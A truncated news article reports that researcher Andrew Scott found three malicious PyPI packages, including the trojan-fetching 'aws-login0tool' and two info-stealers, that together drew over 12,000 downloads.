Malicious PyPI Code Packages Rack Up Thousands of Downloads

The Python code repository was infiltrated by malware bent on data exfiltration from developer apps and more.

Three malicious packages hosted in the Python Package Index (PyPI) code repository have been uncovered, which collectively have more than 12,000 downloads – and presumably slithered into installations in various applications.

Independent researcher Andrew Scott found the packages during a nearly sitewide analysis of the code contained in PyPI, which is a repository of software code created in the Python programming language. Like GitHub, npm and RubyGems, PyPI allows coders to upload software packages for use by developers in building various applications, services and other projects.

Unfortunately, a single malicious package can be baked into multiple different projects – infecting them with cryptominers, info-stealers and more, and making remediation a complex process.

In this case, Scott found a malicious package containing a known trojan malware and two info-stealers.

The trojanized package is called “aws-login0tool,” and once the package is installed, it fetches a payload executable that turns out to be a known trojan, he said.

“I found this package because it was flagged in multiple text searches I did looking at, since that’s one of the most common

Read More: